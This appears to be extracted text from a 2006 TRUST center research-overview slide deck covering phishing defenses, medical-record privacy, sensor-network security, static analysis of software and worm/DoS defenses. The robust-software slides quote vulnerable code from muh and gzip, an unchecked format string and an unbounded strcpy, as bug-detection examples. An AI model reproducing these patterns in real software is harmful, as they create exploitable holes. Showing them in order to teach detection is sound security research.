trust, berkeley site visit, april 26-28, 2006 year 1: research – education – outreach overview...

TRUST, Berkeley Site Visit, April 26-28, 2006

Year 1: Research – Education – OutreachOverview

John Mitchell and Janos Sztipanovits

Year 1 Research Overview 2TRUST, Berkeley Site Visit, April 26-28, 2006

Research Goals

Address pressing issues of the day– Why are computer systems vulnerable to attack?

Will Internet fraud, worms, viruses … be with us forever? Can malicious groups take down critical infrastructures?

– How can we make systems more secure? In ways that are acceptable and desirable to their users?

– What new problems of societal significance can be solved? Medical applications? Manage energy and natural resources?

Deep and lasting scientific progress– Advance the science of computer security– Understand its intersection with system design– Recognize and utilize interdependence w/ other disciplines

Leverage the scale of the TRUST center effectively– Collaboration, education, develop career paths


Research Organization

Five research projects +– Web authentication and online identity theft – Electronic medical records– Sensor nets and embedded systems– Trustworthy systems– Network security and defenses

+ Education (managed through same process)

Each research project combines– Faculty and students from several (3-5) sites– Security, Systems and Software, Social Sciences– Education and outreach activities

Some activities contribute to several projects


TRUST Research Vision

Privacy

Computer andNetwork Security

Electronic MedicalRecords

Identity TheftProject

Secure NetworkedEmbedded Systems

Software Security

Trusted Platforms

Applied Crypto -graphic Protocols

NetworkSecurity

Secure NetworkEmbedded Sys

Forensic and Privacy

Complex Inter -Dependency mod.

Model -basedSecurity Integration.

Econ., Public Pol. Soc. Chall.

Secure Compo -nent platforms

HCI andSecurity

Secure Info Mgt.Software Tools

Component Technologies

Societal Challenges

Integrative Efforts

TRUST will address social, economic and legal challenges

Specific systems thatrepresent these socialchallenges.

Component technologiesthat will provide solutions

Critical Infrastructure

Details have changed but spirit of this vision remains


Problem 1: Online Identity Theft

Password phishing– Forged email and fake web sites steal passwords– Passwords used to withdraw money, degrade trust

Password theft– Criminals break into servers and steal password files

Spyware– Keyloggers steal passwords, product activation codes, etc.

Botnets– Networks of compromised end-user machines spread SPAM, launch

attacks, collect and share stolen information Magnitude

– $$$ Hundreds of millions in direct loss per year– Significant Indirect loss in brand erosion

Loss of confidence in online transactions Inconvenience of restoring credit rating, identity

– Challenge for critical infrastructure protection


TRUST team

Stanford– D Boneh, J Mitchell, D Dill, M Rosenblum, Jennifer Granick (Law School)

– A Bortz, N Chou, C Jackson, N Miyake, R Ledesma, B Ross, E Stinson, Y

Teraguchi, …

Berkeley

– D Tygar, R Dhamija, ,,,

– Deidre Mulligan (UC Berkeley Law), Erin Jones, Steve Maurer, …

CMU

– A Perrig, D Song

– B Parno, C Kuo

Partners and collaborators

– US Secret Service, DHS/SRI Id Theft Tech Council, RSA Securities, …

– R Rodriguez, D Maughan, …

And growing …


TRUST ID Theft Team (+ more)


Phishing Attack

password?

Sends email: “There is a problem with your eBuy account”

User clicks on email link to www.ebuj.com.

User thinks it is ebuy.com, enters eBuy username and password.

Password sent to bad guy


SpoofGuard browser extension

SpoofGuard is added to IE tool bar– User configuration – Pop-up notification as method of last resort


Berkeley: Dynamic Security Skins

Automatically customize secure windows Visual hashes

– Random Art - visual hash algorithm – Generate unique abstract image for each

authentication– Use the image to “skin” windows or web content– Browser generated or server generated


CMU Phoolproof prevention

Eliminates reliance on perfect user behavior Protects against keyloggers, spyware. Uses a trusted mobile device to perform

mutual authentication with the server

password?


Tech Transfer

SpoofGuard– Some SpoofGuard heuristics now used in

eBay toolbar and Earthlink ScamBlocker.– Very effective against basic phishing attacks.

PwdHash– Collaboration with RSA Security to implement PwdHash on

one-time RSA SecurID passwords. RSA SecurID passwords vulnerable to online phishing PwdHash helps strengthen SecurID passwords

New browser extensions for privacy– SafeCache and SafeHistory

Client-side architecture for spyware resistance– SpyBlock: virtualization, browser extension, trusted agent


Botnets: detect and disable

Botnet - Collection of compromised hosts– Spread like worms and viruses– Platform for many attacks

Spam forwarding, Keystroke logging , denial of service attacks Unique characteristic: “rallying”

– Bots spread like worms and trojans– Centralized control of botnet is characteristic feature

Current efforts– Spyware project with Stanford Law School– CMU botnet detection

Based on methods that bots use to hide themselves– Stanford host-based bot detection

Taint analysis, comparing network buffer and syscall args– Botnet and spyware survival

Spyblock: virtualization and containment of pwd


Research Spotlight

StanfordCyberlaw Clinic

Spyware Litigation Project

Lisa Schwartz

Henry Huang

Jennifer Granick

Law, CS faculty,Law students,Many CS grad, undergrad students


Backdoor Trojan spyware– distributed via misleading pop-up– installed even if user clicked the

pop-up’s “close” button Users’ computers transformed

into “marketing machines”– Up to 7 pop-ups/minute, …

Who is behind PacerD?– Seychelles P.O. box, Seattle

voice mail number, Russian ISPsSpyware bundle will install unlessuser takes complex or difficult action

Cyberlaw Clinic: PacerD

Oct. ’05– CS team sets up testing environment

Nov. ’05– CS team creates videos depicting

PacerD installation, …, removal– Rootkits detected inside PacerD

Dec. ’05 – Feb. ‘06– Cyberlaw Clinic drafts lawsuit

March – April ‘06– Over 300 PacerD victims contacted– Litigation plan being developed

CPM Media

KVM Media

PacerD

Exfol

“Pyramid of Deception”


Cyberlaw Clinic: Enternet

Enternet Media (EM) – Internet ad firm in CA

EliteBar a.k.a. Elite Toolbar– distributed through websites– no notice of installation– prevents uninstallation – collects personal information

EULA: unconscionable terms

Enternet hides EULA and uninstaller:

Uninstaller purposely fails to remove EliteBar

Gov’t Suits Against Enternet

FTC filed against Enternet 11/4/05– injunction froze assets– stopping distribution of EliteBar

City of L.A. also sued Enternet– alleging unfair competition, deception

Criminal charges: In LA, March 2006– Incl false advertising, consumer fraud


ID Theft: Future challenges

Criminals become increasingly sophisticated– “In 25 years of law enforcement, this is the closest thing I’ve

seen to the perfect crime” – Don Wilborn Increasing interest at server side

– Losses are significant Need improved platform security

– Protect assets from crimeware Need improved web authentication

– Basic science can be applied to solve problem: challenge-response, two-factor auth, …

Social awareness, legal issues, and human factors– Studies with Law Clinics; user studies, how are users fooled?

Technology transfer– More free software, RSA Security, …

Multi-campus project developing technology, evaluation, social impact Project meetings this spring. Public workshop at Stanford in June.


Problem 2: Healthcare Information

Rise in mature population– Population of age 65 and older with – Medicare was 35 million for 2003 and – 35.4 million for 2004

New types of technology– Electronic Patient Records– Telemedicine– Remote Patient Monitoring

Empower patients: – Access to own medical records– Control the information – Monitor access to medical data

Regulatory compliance

Table compiled by the U.S. Administration on

Aging based on data from the U.S. Census Bureau.

United Nations ▪ “Population Aging ▪ 2002”

2050

Percentage of Population over 60 years oldGlobal Average = 21%


Privacy and regulatory issues

Health Insurance Portability and Accountability Act of 1996 (HIPAA)

– HIPAA Privacy Rule (2003): gives US citizens Right to access their medical records Right to request amendments, accounting of disclosures, etc.

– HIPAA Security Rule (2005): requires healthcare organizations to Protect for person-identifiable health data that is in electronic format

Complexity of privacy– Variable levels of sensitivity; “sensitive” in the eye of multiple

beholders– No bright line between person-identifiable and “anonymous” data

Complexity of access rights and policies– Simple role-based access control is insufficient– Governing principles: “need-to-know” and “minimum disclosure”


ProviderPatient

Payer Society

Primary care

Specialists

AncillariesImmediate

FamilyExtended

Family

Community Support

FriendsLegally Authorized

Reps

Admin.

Staff

Claims Processors

Subcontractors

Clearinghouses

Insurers

Public Health

State Licensure

Boards

Law Enforcement

Internal QA

External accreditation

orgs

Clinical Trials

Sponsors

Fraud Detection

Medical Information

Bureau

Business Consultants

National Security

Bioterrorism Detection

Healthcare Information Access Roles

From: Dan Masys: “The nature of biomedical data”


TRUST and MyHealth Teams (Faculty)

Vanderbilt– J Sztipanovits, G Karsai, A Ledeczi

Stanford– J Mitchell, H Garcia-Molina, R Motwani

Berkeley– R Bajcsy, S Sastry, M Eklund– Deidre Mulligan (UC Berkeley Law)

CMU– M Reiter, D Song

Cornell– J Gehrke, S Wicker, F Schneider

VU Medical Center Collaborators– D Masys, M Frisse, D Giuse, J Jirjis, M Johnson, N Lorenzi,

D Mays,


Patient Portal Project

Vanderbilt MyHealth Patient Portal– Enrolled 8000 patients and grows at the rate of over 1000 new enrollees per month– Secure messaging, access to medical records, appointments

Include real-time monitoring of

congestive heart failure patients– Heterogeneous sensor

network for monitoring– Data integrated into

MyHealth@Vanderbilt Berkeley ITALH Testbed:

seniors in Sonoma– Stationary sensors:

Motion detectors, Camera systems

– Wearable sensor: Fall sensors, Heart rate or pulse monitors


Technical Challenges (1/2)

Access ControlUnique problems:

– Policy languages– Policy validation – Distributed policy enforcement

Data PrivacyUnique problems:

– Learning from data while keeping individual data private

– Publishing data without possibility to link back to individuals– Information flow through data access: “leaking secret data”– Incorporating background knowledge– Interaction between privacy and policy languages


Technical Challenges (2/2)

Distributed trust managementUnique problems:

– Maintaining trust across multiple players with conflicting interests and policies

Information architecture modeling and analysisUnique problems:

– Technical and organizational heterogeneity– Major role of legacy systems– Scale and complexity

Benchmarking – Creation of synthetic patient data – Real-life patient data

Societal Impact of Patient Portals– What privacy policy would make patients comfortable with

contributing data to research study?


Approaches

What solutions are possible? Some examples:– Policy languages (Stanford)– Data privacy (Cornell, Stanford)– Information architecture modeling and analysis

(VU, Berkeley)– Distributed trust management (Cornell, Stanford)– Societal impact (Berkeley)

Use MyHealth (VU) as demo system– Put TRUST research thrusts in MyHealth contexts


Initial Steps

Discussions with VU Medical Center in September, 2005– Prof. Bill Stead, Director, Informatics Center – Prof. Dan Masys, Chair, Department of Biomedical Informatics

Design Workshop for Integrative Project on Patient Portals – December 16, 2005 at Vanderbilt Center for Better Health

(http://dbmi.mc.vanderbilt.edu/trust/#Output)– Identified two project candidates and a joint White Paper topic.

Detailed project planning between TRUST and VU MyHealth – We have a joint memo of collaboration management structure and

research agenda for the next year Workshop on Trust and Privacy in Electronic Medical Records

– April 28th at Berkeley


Meeting at Vanderbilt


Milestones (Year 1)

Policy languages– HIPAA policy representation and validation

Data Privacy– Assemble sample medical database for evaluating privacy

mechanisms, other mechanisms

Information architecture modeling and analysis– Modeling aspects and language specifications– MyHealth architecture modeling and analysis methods

Distributed trust management Societal impact

– Organizational impacts, changes in the decision processes– Unintended consequences study


Research Spotlight

BerkeleyITALH Testbed

Tanya RoostaMarci MeingastEdgar Lobotan

Ruzena Bajcsy

Shankar Sastry

Mike Eklund

Adeeti UllalRustom DessaiWilly CheungAlbert Chang

Electronic Medical Record Project

EECS Faculty, Grad, Undergrad, and SUPERB students


Biomedical sensor systems– Can monitor for acute and

chronic conditions and emergency events

– Can be kept locally or transmitted to healthcare professional and EMRs

Storage in medical record – Potential very useful– Currently ad-hoc and manually

performed

Berkeley ITALH Testbed

Oct ’05 – Mar ’06– Development and testing of fall

sensor system joint with Tampere, Finland and Aarhus, Denmark

Mar – Apr ‘06– Commitment from Telecon Italia– Evaluation of EMR system for

integration in Sonoma Apr – May ‘06

– Preparation of lab for experimentation and EMR integration

Jun – Jul ‘06– SUPERB program focus

Privacy

Security

ITALH System

Fall Detector

Berkeley Mote

RS-232

RS-232

E.g. Bluetooth Sender

E.g. Bluetooth Sender

Berkeley Mote

Sensors

Zigbee

Sensors

Mobile Gateway

Home Health System

Mobile Phone

Integrated Camera

Internetand/or

telephone

Berkeley Motes

Hospital

Terminal, WLAN

Access Control

Data Aggregation

ITALH/EMR Development

Use Berkeley Motes,Fall sensors with accelerometers



Initial Focus: Fall Detection– Falls are the leading cause of

fatal and nonfatal injuries to older people in the U.S.

– Each year, more than 11 million people over 65 fall – one of every three senior citizens

– Treatment of the injuries and complications associated with these falls costs the U.S. over 20 billion annually

Requirements of such a system:– Privacy of data and user

activity, location, etc– Accuracy and robustness– Interoperability as it will form

only one component of a broader system

Secondary Foci:– The devices reveal significant

information about the user– This provides significant

additional opportunities for health monitoring

– It also creates a potential threat to the users privacy

Daily Activity Identification: Sitting, standing,walking



Being able to measure and analyze a patients activity, enables:

– Accurate feedback for at home treatment,

e.g. osteoporosis, where a clear negative correlation has been shown between activity level and bone density loss

– Rapid and automated response to critical and emergency situations

This benefit can only be had on a societal scale if such devices can be integrated in the EMR systems, so that:

– Data acquisition is at least semi-autonomous

– The data can be guaranteed to be accurate

– The system is secure

openEMed Server

openEMed Physician Client

ITALH/openEMed Client

Mobile system

Home system

Healthcare provider/EMR:myHealth

ITALH/EMR Development

Target implementation

Development and testing

Protocols and policies must be established for the inclusion of automated data collection

– A test system is being developed to integrate the ITALH testbed with an open source EMR system

– This will be integrated with the Vanderbilty myHealth system following initial development


Summary

Excellent integrative project candidate Strong interest inside TRUST and in the

medical community We have teamed up with VUMC, which has

the strongest research program and operational testbed

Rapid start-up


Problem 3: Embedded Secure Sensor Networks

TRUST is engaged in the development of embedded secure sensor networks – Integrated center R&D at all levels

Sensor Technology Networks Applications Policy/Legal Issues

Activity at all TRUST sites + collaborators– Oak Ridge National Laboratory, …


Societal Relevance

Health Care Urban Infrastructure Utilities

– Energy production and transport (e.g. SCADA)– Energy utilization monitoring in homes

Search and Rescue– Disaster response

Heavy Industry Process Control– Oil refineries, chemical, etc.– Chevron is an interested player

Border Control and Monitoring


Sensor Technology - The Mote


Sensor Technology Example:Sensors for Bio-Defense

Bi-layer lipid membrane used to create designer bio-sensors

– When target analyte binds to protein, ion channel conductivity increases.

Currently considering use in water supply protection.

Sensor performance statistics used to define networking requirements.

Outside Player: NY Dept of

Health/ Wadsworth Laboratories

cis compartment

trans compartment lipid

bilayer

Ion channel

metallic gate


Sensor Platform Technologies

CU Asynchronous Processor

– Event-driven execution is ideal for sensor platforms

Clockless logic– Spurious signal transitions

(wasted power) eliminated– Hardware only active if it

is used for the computation

MIPS: high-performance– 24pJ/ins and 28 MIPS @

0.6V

Processor Bus Year E/op Ops/sec

Atmel 8 200? 1-4 nJ 4 MIPS

StrongARM 32 200? 1.9 nJ 130 MIPS

MiniMIPS 32 1998 2.3 nJ* 22 MIPS

Amulet3i 32 2000 1.6 nJ* 80 MIPS

80C51 (P) 8 1998 1 nJ** 4 MIPS

Lutonium 8 2003 43 pJ 4 MIPS

SNAP 16 2003 24 pJ 28 MIPS


Designer OS for Sensor Networks

Tiny OS– Large, active open source community: – 500 research groups worldwide– OEP for DARPA Network Embedded Systems

Technology– Thousands of active implementations - the

world’s largest (distributed)sensor testbed MagnetOS: Provide a unifying single-

system image abstraction– The entire network looks like a single Java

virtual machine– MagnetOS performs automatic partitioning

Converts applications into distributed components that communicate over a network

– MagnetOS provides transparent component migration

Moves application components within the network to improve performance metrics

MagnetOSRewriter


Sextant: Node Localization

Use of large numbers of randomly distributed nodes creates need to discover geographic location

– GPS is bulky, expensive, power-hungry

Set up a set of geographic constraints and solve it in a distributed fashion

– Aggressively extract constraints– Use just a few landmarks (e.g. GPS nodes) to anchor the

constraints

Can determine node location with good accuracy, without GPS or other dedicated hardware


SHARP: Hybrid Routing Protocol

Two extremes in routing– Proactive: disseminate routes regardless of

need– Reactive: discover routes when necessary

Neither are optimal for dynamic sensor networks

SHARP adaptively finds the balance point between reactive and proactive routing

– Enables multiple nodes in the network to optimize the routing layer for different metrics

– Outperforms purely reactive and proactive approaches across a range of network conditions


Securing the Sensor Network

Security issues– Develop Taxonomy of Attacks

Attacks with and without defined defenses Generic basis on which to evaluate new networks

– Characterizing Worst-Case Results Statistical learning proposed as a means for determining what can be inferred

from data– Evaluate privacy concerns

Ties into privacy road map Security thrusts

– Secure building blocks Secure key distribution Secure node-to-node and broadcast communication Secure routing Secure information aggregation

– Real-time aspects and security– Secure middleware– Secure information processing– Sensing biometrics– Sensor database processing– Internet-scale sensor networks


Application Projects (Examples)

Patient Monitoring– Remote monitoring of cardiac patients– See Vanderbilt/Cornell/Berkeley poster

Museum Project– Expressive AI projects using sensors to monitor

patrons at public demonstrations Home Sensor Network Development

– Energy monitoring beyond metering– Opportunities for local information fusion

LA Water Supply Protection– BioSensors + Networking + Civil Infrastructure


Research Spotlight

TRUST-ORNLTuFNet

FederatedSensor Networks Project

Akos LedecziISIS-VU

TRUST researchers,graduate students, ORNLresearchers

Yuan XueISIS-VU

ORNL


Outside the window

Jumbotron: automatic camera feed

Jumbotron/Screen: Tracking info inside Google Earth

Security is guard walking around the stadium with a cell-phone connected radiation detector and an XSM mote.

His position is continuously tracked using a radio interferometric technique running on the motes.

A camera automatically tracks his position using the geolocation info from the mote network. When the radiation level crosses a threshold the detector sends

an alarm and the camera zooms in on the position.

Dirty Bomb Detection Demo in VU Stadium April 20, 06


System Vulnerabilities

Rad level servlet and camera glue

code

Tracking service and

user interface

Nextel/Internet

Mote network

Camera controlnode (Linux)

Jumbotroncontroller

VGA to NTSCadapter

Rad detector, mobile phone

mote

Internet

Mac/Link

Network

Application/Service

Physical• Jamming

• Bogus tracking results• Tracking commandSpoofing• Battery consumption attack

• MAC DoS• Eavesdropping

• Packet dropping• Mis-forwarding• ID spoofing• Forging routingInformation• Disclosing/modifying/replaying tracking results

Sensor network vulnerabilities

Traditional network/system vulnerabilities

• Denial of Service Attack• Information disclosing/modification/replaying• Address Spoofing• etc..


Security Support Implemented

Security Support Overview– Jamming Attack Ranging and Tracking using Multiple

Frequencies

– Bogus Tracking Result Majority-based Voting to Filtering

outrange result Peer Authentication among Sensors

– False Tracking Command– Injection of Tracking Result from

Spoofed Sensors Peer Authentication among Sensors

Group-based Peer Authentication– Objective Provide efficient, effective, and flexible peer

sensor authentication

– Solution Symmetric-key based (SkipJack in TinySec) Each sensor node has a different set of keys

through a pre-key distribution scheme Multiple MACs are generated for each message

from a sensor node MACs are verified at the receiver sensor using its

common keys with the sender

– Results computation: 5.3 ms; verification: 2.5 ms (2 common keys), 1.3~1.4ms

(1 shared key), < 0.1 (no keys in common)


Privacy Issues

Policy instruments often lag technology development Proposed development of Privacy Road Map that will

frontload policy development– Map sensor capabilities and network mission into deployment

and data use rules– Key near-term: RFIDs, broad-based visual surveillance– Raises issue of impact of network configuration and

heterogeneity on road map

Approach: Extend fair information practices to cover sensor nets at regulatory or legislative level

– Consent enablement is an important issue


Economic Issues

Consider standards for transactions between sensor network owners/operators– market creation, bargaining, trading rules for

passing data, avoiding monopolies Open platforms enhance markets, range of

products, efficiency– Software for computers vs. software for cell

phones Significant literature on economic costs of

privacy decision making– Cost of inadvertent disclosure


Further Development

Integrate cross-cutting security, privacy, and economic issues into ongoing project development.

Try to stay as generic as possible, while developing technology/policy amenable to evaluation.


Problem 4: Trustworthy Systems

Important problems in the public eye– Why are computer systems vulnerable to attack?

Many security vulnerabilities are software bugs– How can we make systems more secure?

Better human factors, security science and engineering practices Four core areas

– Robust software Including: static, dynamic analysis methods for detecting vulnerabilities

– Security policy What actions should be allowed? How to express, enforce policy?

– Platform integrity Including: hardware attestation, software-based isolation, virtualization

– Intrusion-tolerant systems System architectures and implementation techniques so that systems

will resist and survive attacks


Subarea 1. Robust software

Computer attacks are serious problem– Scripts for exploiting known vulnerabilities– Techniques and tools for creating new exploits

Many possible targets– Widely used UNIX programs: sendmail, BIND, etc.– Various server-type programs

ftp, http (Web server and file transfer) pop, imap (Email server) irc, whois, finger (Other applications, services)

– Mail clients (overrun filenames for attachments) Netscape mail (7/1998) MS Outlook mail (11/1998)


Research Spotlight

Monica Lam

Automated Software Analsys

Find errors that can lead to vulnerabilities


D. Wagner - Detection of Buffer Overrun Vulnerabilities

– Integer range analysis problem– Sendmail: 4 bugs/44 warnings– Features necessary to achieve

better precision Flow sensitivity Pointer analysis

Static Analysis

M. Lam – Combine and improve previous results

– Interprocedural methods– Strategically leverage more

precise aliasing analysis– Standard architecture for

combining methods– Today: B Livshits poster

A. Aiken - Format String Vulnerabilities Type Qualifiers

– “Tainted” annotations, requires some, infers the rest

– Features necessary to achieve better precision

Context sensitivity Field sensitivity

Program

IP SSA

Buffer overruns

Error traces

Format violations

…others…easy to write tools

Can add new

analyses

Data flow NULL deref’s


Example: Tainting Violation in muh

0838 s = ( char * )malloc( 1024 );0839 while( fgets( s, 1023, messagelog ) ) {0840 if( s[ strlen( s ) - 1 ] == '\n' ) s[ strlen( s )...0841 irc_notice( &c_client, status.nickname, s );0842 }0843 FREESTRING( s );0844 0845 irc_notice( &c_client, status.nickname, CLNT_MSGLOGEND );

257 void irc_notice(connection_type *connection, char nickname[], char *format, ... )258 {259 va_list va;260 char buffer[ BUFFERSIZE ];261 262 va_start( va, format );263 vsnprintf( buffer, BUFFERSIZE - 10, format, va );264 va_end( va );

muh.c:839

irc.c:263


Example: Buffer Overrun in gzip

0589 if (to_stdout && !test && !list && (!decompress || ...0590 SET_BINARY_MODE(fileno(stdout));0591 }0592 while (optind < argc) {0593 treat_file(argv[optind++]);

0704 local void treat_file(iname)0705 char *iname;0706 {

...0716 if (get_istat(iname, &istat) != OK) return;

0997 local int get_istat(iname, sbuf)0998 char *iname;0999 struct stat *sbuf;1000 {

...1009 strcpy(ifname, iname);

gzip.c:593

gzip.c:1009

gzip.c:716

Need to have a model of strcpy


Sample Experimental Results

Program Version # LOC Procedures

lhttp 0.1 888 21bftpd 1.0.11 2,946 47trollftpd 1.26 3,584 48man 1.5h1 4,139 83cfingerd 1.4.3 5,094 66muh 2.05d 5,695 95gzip 1.2.4 8,162 93

Monica Lam study: 7 server-type programs

Program Total Buffer Format False Number Number Definitions Proce Tool'sname number of overruns string positives of of spanned dures runtime

warnings violations sources sinks spanned sec

lhttpd 1 1 20 (w/o preds) 4 1 7 4 7.08bftpd 2 1 1 5 2 5,7 1,3 2.34trollftpd 1 1 4 1 23 5 8.52man 1 1 3 1 6 4 9.67cfingerd 1 1 4 1 10 4 7.44muh 1 1 3 1 7 3 7.52gzip 1 1 3 1 7 5 2.03

Other studies (Engler, Wagner, etc.) achieve similar results for other kinds of errors

Significant bugs found using automated tools

TRUST challenge: compare and combine methods developed by different campuses


Larger Picture

Goal: New techniques for improving the security of our software– Many complementary approaches:

Static analysis of source code; Dynamic analysis with symbolic execution; Taint and information flow tracking; Inline reference monitors; Proof-carrying code; Logical decision procedures; Semantics and foundations of programming languages

– Many exciting uses: Detection of security bugs; Automatic generation of signatures for intrusion

detection or virus scanning; Verification of security properties TRUST Collaboration

– Many cross-institution collaborations underway / recently initiated– Challenge applications to demonstrate our methods:

Hardening the security of open source software Protect network services/servers against data-driven remote attacks Improving the quality of electronic voting software

– Shared benchmarks: Apache (including core, plug-ins, PHP scripts, …) TCP/IP stacks Network servers? One or two key industrial applications?

(Productivity software? Medical? E-commerce? Internet services?)


Partner: Coverity, Inc

Stanford, Symantec, Coverity, DHS Open Source Software Quality Project


Subarea 2. Security policy

Access policy– How to express, enforce policy?– Policy lifecycle management (debugger, etc)

Enforcement– Control access and propagation

E.g., Java stack inspection What code to trust?

– How to enforce end-to-end policy? e.g., information I cannot be transmitted to output O Access control mechanisms are necessary, access

control policies are insufficient


Enforcing language-based security

Programs are annotated with security policies

Compiler checks, possibly transforms program to ensure that all executions obey rules

Loader, run-time system validates program policy against system policies

Source CodePolicy

Target Code Policy

SystemPolicy

Executable code

?


Subarea 3. Platform integrity

Trusted platforms and attestation– “Trusted platforms” refers to platforms in which the running

software has been authenticated as having desirable attributes

– “Attestation” refers to authenticating the software running on a node remotely

Example projects– Nexus OS implementing new trustworthy computing

abstractions (Cornell)– Privacy-preserving attestation (Stanford)– TERRA attestation of full virtual machines (Stanford) – Software attestation (CMU)– Trusted user input/output (CMU, Stanford)


Subarea 4. Intrusion-tolerant systems

Sample direction: distributed trust– Implement services in a distributed fashion so that no one

component is trusted Example projects

– In P2P systems that mask node misbehaviors (Cornell) Prevents injecting a name into CODONS (a DNS replacement) Prevents injecting a page into Cobweb (Akamai-like web cache) Prevents injecting bad info into Corona (news system for web)

– In certificate authorities and single sign-on (Cornell)– In storage systems (Stanford, CMU)– Underlying protocols for service deployment, access (CMU)– Formal verification of distributed trust protocols (Cornell)– Implementing default-disconnect in LANs (Stanford)


Problem 5: Network Security

Networked applications are susceptible to attack– Develop secure methods for resisting network attacks

Cryptography is powerful, but requires key management Examples: SSL/TLS, VPN, key management for IPSEC

– New applications raise new challenges, e.g. VoIP

Network infrastructure is susceptible to attack– DoS, Virus and worm propagation flood network, blocks traffic– Authenticated access to wireless network– Isolation (traffic shaping, firewalls), Intrusion detection

Goals include:– Improve security of networks and applications that use them– Collaborate on next-generation networking– Improve educational resources on network security


Example True SCADA Scenarios

Port of Houston, 20 Sept 2001– >1 billion containers (2000), 6,400 ships (2002), $11 billion revenue (2002)– $15 billion petrochemical complex: largest in nation, second in the world– Web site disabled by denial of service attack– 19 year old UK teenage member of a group called Allied Haxor Elite trying to get

back at a girl he met in a chatroom (Found not guilty)

Ohio's Davis-Besse nuclear power plant, offline, Jan 2003– Slammer worm penetrated a private computer network and disabled a safety

monitoring system for ~5 hours– Penetrated unsecured network of an unnamed Davis-Besse contractor, then

squirmed through a T1 line bridging that network and Davis-Besse's corporate network

Northeast power outage, 50 million people, August 2003– MSBlaster worm crippled key detection systems and delayed response during a

critical time: “significantly worsened the effect of the outage”


General Network Threats

Worms/Viruses – Propagation

Hackers/Intruders – Infiltration

Compromised Machines – Botnets

Insider Threat – Exfiltration


Research Spotlight

Worm/DoS Defense

One slice of network security

research in TRUST


Can We Build a “DOS Firewall”?

Example of the efficacy of published DoS filters

Trained on attack & normal traffic

Trained on normal traffic only

[Collins & Reiter]


Egress Limiting for Worm Containment

Detection: Large fan-out, increased failures, no DNS translationsContainment: Rate limiting

[Wong, Studer, Bielski & Wang]


Internet Indirection Infrastructure (i3)

Sender

id Rtrigger

iddata

Receiver (R)

iddata

Rdata

Victim (V)id V

Attacker(A)

Use backup triggers on other i3 nodes to mitigate DoS attacks

[Stoica]


Ingress Rate Limiting w/ Client Puzzles

Adversary

Server

Legitimate client

Designing puzzle mechanisms to defend against – Connection depletion attacks (TCP)– Bandwidth exhaustion attacks (IP)

[Wang & Reiter]


PI Marking

Queue-based marking– Routers “push” marking into IP Identification field

Marks can be used to filter …– Unaffected by source address spoofing

… or returned to source to use as a capability

[Yaar, Perrig, Song]


Sting: Auto Worm Defense System

!

ExploitDetected!

[Brumley, Newsome, Song]


TrafficComber

Distributed high-speed network monitoring system– Efficiently detect new (global) traffic behavior

– Accurately identify malicious IP addresses & attack patterns

Focuses & components– Streaming algorithms design

Fast memory-efficient algorithms for high-speed links New streaming algorithms for superspreader detection

– Machine learning, graph theory techniques Traffic correlation & anomaly detection Stepping-stone detection

– Privacy-preserving information sharing New cryptographic algorithms/protocols Privacy-preserving set operations

[Blum, Gibbons, Kissner, Song, Venkataraman]


Finding the Source of Worms

Attack Reconstruction: identify communications that carry attack forwardAttacker Identification: pinpoint attack source(s) Are these possibly feasible?

BE

F

C D

G

H

t1 t3

t2

t4

t7t5

t6

Host contact graph Host attack tree

[Sekar, Xie, Maltz, Reiter, Zhang]


DETER (http://www.deterlab.net/)

Background– Lack of large-scale experimental infrastructure– Missing objective test data, traffic and metrics

Goals– Facilitate scientific experimentation

Establish baseline for validation of new approaches Scientifically rigorous testing frameworks/methodologies Attack scenarios/simulators, topology generators,

background traffic, monitoring/visualization tools

– Provide an open safe platform for experimental approaches that involve breaking the network

“Real systems, Real code, Real attacks!”


PC

‘User’Server

PC

Control Network

ISI Cluster

Userfiles

Cisco SW Foundry SW

Node Serial Line Server

‘Boss’Server

PC PC

UCB Cluster

PowerCont’ler

PowerCont’ler

PC … …

trunk trunk

Control Network

Internet

IPsec

IPsec

User

FW

CE

NIC

FW

Node Serial Line Server

Backup‘User’

Backup ‘Boss’


Example DETER Topologies


DETER Testbed Status

201 nodes now available!– Expect to double in 2006

Experimental node OS:– Standard OS: RedHat Linux 7.3 or FreeBSD 4.9– New: Windows XP– Users can load arbitrary code, in fact

User has root access to all allocated nodes– Secure process replaces OS after each experiment– Adding support to scrub disks after experiments

Funded by NSF CISE and DHS HSARPA– Open to all researchers: gov’t, industrial, and academic


Network protocol analysis

Protocol analysis methods– Model checking, automated tools– Logical proof methods

Case studies– 802.11i Wireless networking– IKE for IPSEC– VoIP – security additions to SIP

Work with standards organizations– IEEE: contributed to 802.11i standard– IETF/IEEE: 802.16e metro area networking– Wi-Fi Alliance: wireless access point registration

Education: course development, materials Research challenges

– Extend applicability of tools, improve usability– Fundamental science: protocol analysis and crypto– Clean slate network design: what are better designs?


Network Security

Huge field– Many challenges– Lots of different kinds of work

From network protocols to routing, congestion control

Outstanding opportunities– GENI initiative for Internet redesign– DETER testbed, Industrial collaboration– Network researchers at all TRUST sites

Drinking from a firehose

TRUST, Berkeley Site Visit, April 26-28, 2006

Education

Sigurd Meldal (SJSU)Janos Sztipanovits (Vanderbilt)


Education Vision

Trust education– part of technological and social literacy– central to technological and policy-making professional

competency Trust education integrates domains

– trust solutions = policy options + technology options Trust education within domains

– From engineering to the social sciences Trust education cuts across education levels

– K-12, undergraduate programs, profession-oriented masters programs, research-oriented doctoral programs


Education Implementation

Main Activities

– Education Community Development (EDC)– The TRUST Academy Online (TAO)– Curriculum Development and Refinement– TRUST Workshops


Participants in the Ecosystem

QuickTime™ and aTIFF (Uncompressed) decompressor

are needed to see this picture.

QuickTime™ and aTIFF (LZW) decompressor











are needed to see this p icture.


Knowledge Certification

Standardized knowledge units: National Information Assurance Training

Standards (CNSS) NIETP Centers for Academic Excellence in IA

Education

Assist in the broad adoption of such curricula.

Evaluate, adapt or substitute units or standards as indicated by domain requirements


Learning Technology Infrastructure

Established strong relationship between TRUST and VaNTH* – Assessment Methods and Technology– Learning Technology

Challenge-based courses (design and delivery methods)

Adaptive learning and course delivery strategies, development of adaptive expertise

* Vanderbilt-Northwestern-Texas-Harvard/MIT Engineering Research Center


Education Spotlight

TRUSTAcademy On-Line

TRUSTRepository Project

TRUST researchers,graduate students,VaNTH researchers

Yuan XueISIS-VU

Xiao SuSJSU

Larry HowardISIS-VU

Sigurd MeldalSJSU

Weider Yu SJSU

Simon Shim SJSU


Aspects of support– Collaborative, evolutionary

design of adaptive learning experiences

– Instrumented enactment of designs with learners

– Design reflection by educators– Online dissemination

TRUST Academy On-line

Principal components– Visual integrated design

environment (CAPE) Design and content repository

– Interoperable delivery platform (eLMS)

– Dissemination Portal (TAO)


TAO Content

